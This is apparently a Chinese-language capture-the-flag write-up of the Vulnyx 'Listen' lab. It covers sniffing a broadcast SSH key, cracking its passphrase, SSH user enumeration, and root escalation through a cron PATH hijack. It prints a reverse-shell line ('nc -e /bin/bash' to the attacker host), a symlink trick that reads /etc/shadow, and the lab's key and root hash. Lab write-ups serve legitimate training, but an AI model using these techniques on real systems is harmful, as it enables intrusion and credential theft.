Vulnyx Listen

信息收集

IP=192.168.0.187
nmap $IP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-31 12:59 HKT
Nmap scan report for 192.168.0.187
Host is up (0.014s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
8000/tcp open  http-alt

Nmap done: 1 IP address (1 host up) scanned in 6.83 seconds

8000 有 http 服务。
就一句话：

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.7.3
Date: Fri, 31 May 2024 05:02:22 GMT
Content-type: text/html
Content-Length: 44
Last-Modified: Sat, 03 Jun 2023 18:24:27 GMT

You just have to listen to open the door...

看起来是 Python 的 SimpleHTTP 服务。

先扫一下目录。

gobuster dir -u http://$IP:8000 -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,bk,bak,zip,tar,gz,7z

扫不到啥东西，既然让我听，那就是说它在发送什么东西，我需要监听？ 可是我也不知道端口、目标，那么就先抓包看看。

抓包

需要抓这个$IP 的流量

sudo tcpdump -i eth0 -A host $IP

原来是广播数据：

13:14:26.246879 IP 192.168.0.187.58770 > 255.255.255.255.65000: UDP, length 1743
E....p .@..=..............$b-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,F119F21F757AA02E

60VDTTAEKN+G42UaazF6SpYDVmr/v6n2vP1Fags211o6f5i13lcRvlxrDnOr/ZTv
hlFuRDw+ed4PH/blCusTBYG83JIalTTiaqjVZMHNeZ3dn0VA4zuNfM2a1EP5SZFn
pnmyHxX3sxi6u8j6FEH7+NsBI2jvVlYTbCLaAt6bA7tBv8qEKh+Rb87Yf4kKo8fl
ZDnskHDdI/djjUR/A25JxRXOfn1Sq//shU1NWli+CNjUhQO5IruJceWBAg8kciu0
hrJD/ExqbgODzsHBEYuXE/C+I5TQNRJLRXvp0VCwg9hSC+sd2oyGdok4M9Fiyn6a
q517hjQq2C5Ph85Sx8wmsuQ4nA5QXR375Qc5PkodlVzrQTzNLCcbtI6IWO5mQGWB
AUlEV269cwy6tXqVVhk7DCOXjoiekspMN5fLlyAAe0cTiM9Uk5Aw7hIjnR1Zweit
h4fW9vqG4frXBjAJ6qnHzZikNqMg6MUYQmcJCpbUPeGPv/Gfd+wpUnBGmvQkCvz3
5+jG9SOLLrdHDNC6U18hT1lubTPzg8aE4kdQxQSu2gKRN8bYiCLNEqZcSCANWmMq
cm7+cUiU/7XxIczvVqye2elWgCgbo0m4USwIeEeNcGWoPqgYaCfKx6iZkXfLLJz3
OQQ7JguZNs+v+N4Mwv5YSJeVhOWLSkeRg2RJe8nNSCoTwl+aDvOvrbd8GecZIgPK
gXHBkz3YWtCMTu3c7AAyOvOIgD1n3ANnNdMXXKAq0Wiu8UDqLDEIG32jFE3yU2Ef
C9Kwe/SuXMazLrzd2QoL6+pI0LK+W2OYCcsgNuhIHG+tF674Yb0/4K5flVAlGqXT
xcw+xImF5uz1ZNeQlS4fwR3D18AbfIrx7nhsE1MWoDiEtJVU0jcM+JGh3lElFBFv
ax6KVGRyA1mg8Qf3GmZuyng+1YNC2xsVIba52RUlPdRSZ6MolVytNfTPjsyzswpc
WVufdxU8mgCSKJwhydgPc0wU9p32kDCniNZWo86cSYCBqpIipotkHAjdD6/AXhOW
veJ2qLtsHIiqrk5IrDguAtMgxbGdgiGMHrOcwXKtM2MCRNg7i1k3n6/b2P3Xx0jS
MUEYIGyjRl01Y3pGZhfpZ4uRklYEjdT9xktFrfNphipQqhi+pwg43cettLVxWr4N
lER24HMkc0jBWOWA+deheDdzSB2jkaFSn4JfUnujeGmhfSJlxbZohQ5nzQApALK8
SpZyDc8zOgvmYIzTGP8Eif86QNrlN0NDssrw1p8InIbvGZr7AivjFxlUCVtPeDhG
4dJ7zqHTODtVYdK3WYHg0jZLkW3QQ9PHW2SakDhJwxS6r/VtbOJ/+ABlu1oUJa3+
hZ0sxTEHtFq
13:14:26.350237 IP 192.168.0.187 > 255.255.255.255: udp
E..#.p..@..=........Eez4qL/c1mFJpRJvydvQpZbK+TMSztBbioO4LyQ83YwEE64gzMfG2
MCq8vL2KWUhZTnIYS0OZIp8Zjxp7WrUJYdDH0U4EFZRI8kQhw2kfOA5gu+apFO1Z
DGHdCKgM6ZxjBpKPZZ3hDGmMCeDMP6HKCgjQ/MIYFP7y3+YXpBrKMAFRwwn1VlXI
5GL61FxMTq30oA3FEspUkN06K8yd/85LK7XS2OXwSo7AQckJghHswg==
-----END RSA PRIVATE KEY-----

看起来是把私钥给发出来了.
去掉头尾，报错到文件中:

vim id_rsa

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,F119F21F757AA02E

60VDTTAEKN+G42UaazF6SpYDVmr/v6n2vP1Fags211o6f5i13lcRvlxrDnOr/ZTv
hlFuRDw+ed4PH/blCusTBYG83JIalTTiaqjVZMHNeZ3dn0VA4zuNfM2a1EP5SZFn
pnmyHxX3sxi6u8j6FEH7+NsBI2jvVlYTbCLaAt6bA7tBv8qEKh+Rb87Yf4kKo8fl
ZDnskHDdI/djjUR/A25JxRXOfn1Sq//shU1NWli+CNjUhQO5IruJceWBAg8kciu0
hrJD/ExqbgODzsHBEYuXE/C+I5TQNRJLRXvp0VCwg9hSC+sd2oyGdok4M9Fiyn6a
q517hjQq2C5Ph85Sx8wmsuQ4nA5QXR375Qc5PkodlVzrQTzNLCcbtI6IWO5mQGWB
AUlEV269cwy6tXqVVhk7DCOXjoiekspMN5fLlyAAe0cTiM9Uk5Aw7hIjnR1Zweit
h4fW9vqG4frXBjAJ6qnHzZikNqMg6MUYQmcJCpbUPeGPv/Gfd+wpUnBGmvQkCvz3
5+jG9SOLLrdHDNC6U18hT1lubTPzg8aE4kdQxQSu2gKRN8bYiCLNEqZcSCANWmMq
cm7+cUiU/7XxIczvVqye2elWgCgbo0m4USwIeEeNcGWoPqgYaCfKx6iZkXfLLJz3
OQQ7JguZNs+v+N4Mwv5YSJeVhOWLSkeRg2RJe8nNSCoTwl+aDvOvrbd8GecZIgPK
gXHBkz3YWtCMTu3c7AAyOvOIgD1n3ANnNdMXXKAq0Wiu8UDqLDEIG32jFE3yU2Ef
C9Kwe/SuXMazLrzd2QoL6+pI0LK+W2OYCcsgNuhIHG+tF674Yb0/4K5flVAlGqXT
xcw+xImF5uz1ZNeQlS4fwR3D18AbfIrx7nhsE1MWoDiEtJVU0jcM+JGh3lElFBFv
ax6KVGRyA1mg8Qf3GmZuyng+1YNC2xsVIba52RUlPdRSZ6MolVytNfTPjsyzswpc
WVufdxU8mgCSKJwhydgPc0wU9p32kDCniNZWo86cSYCBqpIipotkHAjdD6/AXhOW
veJ2qLtsHIiqrk5IrDguAtMgxbGdgiGMHrOcwXKtM2MCRNg7i1k3n6/b2P3Xx0jS
MUEYIGyjRl01Y3pGZhfpZ4uRklYEjdT9xktFrfNphipQqhi+pwg43cettLVxWr4N
lER24HMkc0jBWOWA+deheDdzSB2jkaFSn4JfUnujeGmhfSJlxbZohQ5nzQApALK8
SpZyDc8zOgvmYIzTGP8Eif86QNrlN0NDssrw1p8InIbvGZr7AivjFxlUCVtPeDhG
4dJ7zqHTODtVYdK3WYHg0jZLkW3QQ9PHW2SakDhJwxS6r/VtbOJ/+ABlu1oUJa3+
hZ0sxTEHtFqEez4qL/c1mFJpRJvydvQpZbK+TMSztBbioO4LyQ83YwEE64gzMfG2
MCq8vL2KWUhZTnIYS0OZIp8Zjxp7WrUJYdDH0U4EFZRI8kQhw2kfOA5gu+apFO1Z
DGHdCKgM6ZxjBpKPZZ3hDGmMCeDMP6HKCgjQ/MIYFP7y3+YXpBrKMAFRwwn1VlXI
5GL61FxMTq30oA3FEspUkN06K8yd/85LK7XS2OXwSo7AQckJghHswg==
-----END RSA PRIVATE KEY-----

chmod 600 id_rsa

尝试登录

└─$ ssh -i id_rsa root@$IP
Enter passphrase for key 'id_rsa':
[email protected]'s password:

需要密码，john 破解：

ssh2john id_rsa > id_rsa.hash
john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
idontknow        (id_rsa)
1g 0:00:00:00 DONE (2024-05-31 13:25) 100.0g/s 134400p/s 134400c/s 134400C/s cuties..phoebe
Use the "--show" option to display all of the cracked passwords reliably

密码看到了：idontknow

用 root 试了，不行，看来还不是 root 用户。 看来是要爆破用户名。

翻了下大佬的 WP，https://www.bilibili.com/video/BV1mU411o7pQ/?spm_id_from=333.788&vd_source=3aefc8f78d21af4b1df44ab92654ae4e

原来是用 OpenSSH 的一个漏洞，可以枚举用户名。

枚举用户名

msfconsole
msf6 > search openSSH

Matching Modules
================

   #  Name                                         Disclosure Date  Rank    Check  Description
   -  ----                                         ---------------  ----    -----  -----------
   0  post/windows/manage/forward_pageant          .                normal  No     Forward SSH Agent Requests To Remote Pageant
   1  post/windows/manage/install_ssh              .                normal  No     Install OpenSSH for Windows
   2  post/multi/gather/ssh_creds                  .                normal  No     Multi Gather OpenSSH PKI Credentials Collection
   3  auxiliary/scanner/ssh/ssh_enumusers          .                normal  No     SSH Username Enumeration
   4    \_ action: Malformed Packet                .                .       .      Use a malformed packet
   5    \_ action: Timing Attack                   .                .       .      Use a timing attack
   6  exploit/windows/local/unquoted_service_path  2001-10-25       great   Yes    Windows Unquoted Service Path Privilege Escalation


Interact with a module by name or index. For example info 6, use 6 or use exploit/windows/local/unquoted_service_path

use auxiliary/scanner/ssh/ssh_enumusers


msf6 auxiliary(scanner/ssh/ssh_enumusers) > show options

Module options (auxiliary/scanner/ssh/ssh_enumusers):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CHECK_FALSE   true             no        Check for false positives (random username)
   DB_ALL_USERS  false            no        Add all users in the current database to the list
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...
                                            ]
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/us
                                            ing-metasploit/basics/using-metasploit.html
   RPORT         22               yes       The target port
   THREADS       1                yes       The number of concurrent threads (max one per host)
   THRESHOLD     10               yes       Amount of seconds needed before a user is considered found
                                            (timing attack only)
   USERNAME                       no        Single username to test (username spray)
   USER_FILE                      no        File containing usernames, one per line


Auxiliary action:

   Name              Description
   ----              -----------
   Malformed Packet  Use a malformed packet



View the full module info with the info, or info -d command.


set USER_FILE /usr/share/wordlists/seclists/Usernames/Names/names.txt
set rhosts 192.168.0.187
run

[*] 192.168.0.187:22 - SSH - Using malformed packet technique
[*] 192.168.0.187:22 - SSH - Checking for false positives
[*] 192.168.0.187:22 - SSH - Starting scan
[+] 192.168.0.187:22 - SSH - User 'abel' found

果然找到了用户名：abel

登录

ssh -i ./id_rsa abel@$IP
Enter passphrase for key './id_rsa':
id
uid=1000(abel) gid=1000(abel) groups=1000(abel)

提权

sudo -l
# 没有 sudo，
# 养成看定时任务的习惯：
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/dev/shm:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root cp /var/www/html/index.html /tmp

看到了，root 会复制 index.html 到 /tmp.
看看 index.html 的文件权限

ls -l /var/www/html/index.html
-rw-r--r-- 1 abel abel 44 Jun  3  2023 /var/www/html/index.html

文件权限就是登录用户的. 那么删了这个文件，然后 ln 过来，利用 root 的权限，把 root 的私钥复制到 /tmp 就行了。

rm /var/www/html/index.html
ln -s /root/.ssh/id_rsa /var/www/html/index.html
watch cat /tmp/index.html

等了半天，没有反应，看来可能是没有 .ssh/id_rsa 这个文件。那么尝试下 shadow

rm /var/www/html/index.html
ln -s /etc/shadow /var/www/html/index.html
watch cat /tmp/index.html

root:$6$kehps0VQtaANi.xy$3vYwx8t6WSrRmBgMCFxwyoryLOYeESSGHufAjRYpvfjZcb5s/myJHSkchJ/LPDs3Nm2vvXb7cHz4wzSQ4asEL/:19511:0:99999:7:::

看到了 root 的 hash，john 破解：

john root.hash --wordlist=/usr/share/wordlists/rockyou.txt

跑了很久，没有结果。估计不是这条路。再回去看看定时任务，root cp /var/www/html/index.html /tmp
对于这命令来说，拿到 root.txt 应该够了，不过拿到 root 的 shell，似乎刚才的私钥和 shadow 暂时没有。
不过看到了顶部还有一句：PATH=/usr/local/sbin:/dev/shm:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
这里的/dev/shm 不是很明显给了一个口子,我记得这个路径是共享内存，可以写入的。

abel@listen:/tmp$ ls -al /dev/shm       
total 0
drwxrwxrwt  2 root root   40 May 31 06:56 .
drwxr-xr-x 17 root root 3180 May 31 06:56 ..

果然，那我直接在这里造一个 cp

echo "nc -e /bin/bash 192.168.0.30 4444" > /dev/shm/cp
chmod +x /dev/shm/cp

pwncat-cs -lp 4444
(remote) root@listen:/root# id
uid=0(root) gid=0(root) groups=0(root)

撒花 🎉🎉🎉